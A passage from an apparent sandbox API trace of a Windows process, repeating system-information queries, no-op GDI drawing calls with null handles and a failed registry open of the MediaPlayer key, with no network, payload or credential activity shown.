dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.815] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.816] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.816] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.816] BeginPath (hdc=0x0) returned 0 [0017.816] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.816] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.816] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.816] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.816] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.816] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.816] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.816] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e040713 [0017.816] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5404027d [0017.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd2 [0017.816] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd3 [0017.816] CombineRgn (hrgnDst=0x1040dd2, hrgnSrc1=0x5e040713, hrgnSrc2=0x5404027d, iMode=1) returned 1 [0017.816] CombineRgn (hrgnDst=0x1040dd3, hrgnSrc1=0x5e040713, hrgnSrc2=0x5404027d, iMode=4) returned 2 [0017.816] CreateSolidBrush (color=0xff) returned 0x2100dd1 [0017.816] CreateSolidBrush (color=0xff0000) returned 0x1100dd4 [0017.816] DeleteObject (ho=0x1100dd4) returned 1 [0017.816] DeleteObject (ho=0x5404027d) returned 1 [0017.816] DeleteObject (ho=0x5e040713) returned 1 [0017.816] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.816] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.816] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.816] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.816] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.816] BeginPath (hdc=0x0) returned 0 [0017.816] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.817] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.817] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.817] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.817] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5504027d [0017.817] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f040713 [0017.817] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd5 [0017.817] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd6 [0017.817] CombineRgn (hrgnDst=0x1040dd5, hrgnSrc1=0x5504027d, hrgnSrc2=0x5f040713, iMode=1) returned 1 [0017.817] CombineRgn (hrgnDst=0x1040dd6, hrgnSrc1=0x5504027d, hrgnSrc2=0x5f040713, iMode=4) returned 2 [0017.817] CreateSolidBrush (color=0xff) returned 0x2100dd4 [0017.817] CreateSolidBrush (color=0xff0000) returned 0x1100dd7 [0017.817] DeleteObject (ho=0x1100dd7) returned 1 [0017.817] DeleteObject (ho=0x5f040713) returned 1 [0017.817] DeleteObject (ho=0x5504027d) returned 1 [0017.817] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.817] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.817] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.817] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.817] BeginPath (hdc=0x0) returned 0 [0017.817] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.817] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.817] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.817] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.817] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.818] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.818] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.818] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60040713 [0017.818] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5604027d [0017.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd8 [0017.818] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd9 [0017.818] CombineRgn (hrgnDst=0x1040dd8, hrgnSrc1=0x60040713, hrgnSrc2=0x5604027d, iMode=1) returned 1 [0017.818] CombineRgn (hrgnDst=0x1040dd9, hrgnSrc1=0x60040713, hrgnSrc2=0x5604027d, iMode=4) returned 2 [0017.818] CreateSolidBrush (color=0xff) returned 0x2100dd7 [0017.818] CreateSolidBrush (color=0xff0000) returned 0x1100dda [0017.818] DeleteObject (ho=0x1100dda) returned 1 [0017.818] DeleteObject (ho=0x5604027d) returned 1 [0017.818] DeleteObject (ho=0x60040713) returned 1 [0017.818] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.818] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.818] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.818] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.818] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.818] BeginPath (hdc=0x0) returned 0 [0017.818] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.818] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.818] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.818] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.818] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.818] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.819] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.819] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5704027d [0017.819] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x61040713 [0017.819] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ddb [0017.819] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ddc [0017.819] CombineRgn (hrgnDst=0x1040ddb, hrgnSrc1=0x5704027d, hrgnSrc2=0x61040713, iMode=1) returned 1 [0017.819] CombineRgn (hrgnDst=0x1040ddc, hrgnSrc1=0x5704027d, hrgnSrc2=0x61040713, iMode=4) returned 2 [0017.819] CreateSolidBrush (color=0xff) returned 0x2100dda [0017.819] CreateSolidBrush (color=0xff0000) returned 0x1100ddd [0017.819] DeleteObject (ho=0x1100ddd) returned 1 [0017.819] DeleteObject (ho=0x61040713) returned 1 [0017.819] DeleteObject (ho=0x5704027d) returned 1 [0017.819] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.819] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.819] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.819] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.819] BeginPath (hdc=0x0) returned 0 [0017.819] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.819] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.819] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.819] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.820] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x62040713 [0017.820] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5804027d [0017.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dde [0017.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ddf [0017.820] CombineRgn (hrgnDst=0x1040dde, hrgnSrc1=0x62040713, hrgnSrc2=0x5804027d, iMode=1) returned 1 [0017.820] CombineRgn (hrgnDst=0x1040ddf, hrgnSrc1=0x62040713, hrgnSrc2=0x5804027d, iMode=4) returned 2 [0017.820] CreateSolidBrush (color=0xff) returned 0x2100ddd [0017.820] CreateSolidBrush (color=0xff0000) returned 0x1100de0 [0017.820] DeleteObject (ho=0x1100de0) returned 1 [0017.820] DeleteObject (ho=0x5804027d) returned 1 [0017.820] DeleteObject (ho=0x62040713) returned 1 [0017.820] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.820] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.820] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.820] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.820] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.820] BeginPath (hdc=0x0) returned 0 [0017.820] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.820] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.820] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.820] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.820] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.820] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.820] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.820] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.821] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5904027d [0017.821] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x63040713 [0017.821] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de1 [0017.821] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de2 [0017.821] CombineRgn (hrgnDst=0x1040de1, hrgnSrc1=0x5904027d, hrgnSrc2=0x63040713, iMode=1) returned 1 [0017.821] CombineRgn (hrgnDst=0x1040de2, hrgnSrc1=0x5904027d, hrgnSrc2=0x63040713, iMode=4) returned 2 [0017.821] CreateSolidBrush (color=0xff) returned 0x2100de0 [0017.821] CreateSolidBrush (color=0xff0000) returned 0x1100de3 [0017.821] DeleteObject (ho=0x1100de3) returned 1 [0017.821] DeleteObject (ho=0x63040713) returned 1 [0017.821] DeleteObject (ho=0x5904027d) returned 1 [0017.821] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.821] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.821] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.821] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.821] BeginPath (hdc=0x0) returned 0 [0017.821] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.821] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.821] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.821] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.821] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x64040713 [0017.821] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a04027d [0017.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de4 [0017.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de5 [0017.822] CombineRgn (hrgnDst=0x1040de4, hrgnSrc1=0x64040713, hrgnSrc2=0x5a04027d, iMode=1) returned 1 [0017.822] CombineRgn (hrgnDst=0x1040de5, hrgnSrc1=0x64040713, hrgnSrc2=0x5a04027d, iMode=4) returned 2 [0017.822] CreateSolidBrush (color=0xff) returned 0x2100de3 [0017.822] CreateSolidBrush (color=0xff0000) returned 0x1100de6 [0017.822] DeleteObject (ho=0x1100de6) returned 1 [0017.822] DeleteObject (ho=0x5a04027d) returned 1 [0017.822] DeleteObject (ho=0x64040713) returned 1 [0017.822] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.822] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.822] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.822] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.822] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.822] BeginPath (hdc=0x0) returned 0 [0017.822] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.822] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.822] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.822] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.822] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.822] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.822] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.822] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b04027d [0017.822] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x65040713 [0017.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de7 [0017.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de8 [0017.823] CombineRgn (hrgnDst=0x1040de7, hrgnSrc1=0x5b04027d, hrgnSrc2=0x65040713, iMode=1) returned 1 [0017.823] CombineRgn (hrgnDst=0x1040de8, hrgnSrc1=0x5b04027d, hrgnSrc2=0x65040713, iMode=4) returned 2 [0017.823] CreateSolidBrush (color=0xff) returned 0x2100de6 [0017.823] CreateSolidBrush (color=0xff0000) returned 0x1100de9 [0017.823] DeleteObject (ho=0x1100de9) returned 1 [0017.823] DeleteObject (ho=0x65040713) returned 1 [0017.823] DeleteObject (ho=0x5b04027d) returned 1 [0017.823] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.823] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.823] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.823] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.823] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.823] BeginPath (hdc=0x0) returned 0 [0017.823] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.823] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.823] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.823] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.823] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.823] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x66040713 [0017.823] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c04027d [0017.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dea [0017.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040deb [0017.823] CombineRgn (hrgnDst=0x1040dea, hrgnSrc1=0x66040713, hrgnSrc2=0x5c04027d, iMode=1) returned 1 [0017.823] CombineRgn (hrgnDst=0x1040deb, hrgnSrc1=0x66040713, hrgnSrc2=0x5c04027d, iMode=4) returned 2 [0017.823] CreateSolidBrush (color=0xff) returned 0x2100de9 [0017.823] CreateSolidBrush (color=0xff0000) returned 0x1100dec [0017.824] DeleteObject (ho=0x1100dec) returned 1 [0017.824] DeleteObject (ho=0x5c04027d) returned 1 [0017.824] DeleteObject (ho=0x66040713) returned 1 [0017.824] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.824] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.824] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.824] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.824] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.824] BeginPath (hdc=0x0) returned 0 [0017.824] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.824] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.824] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 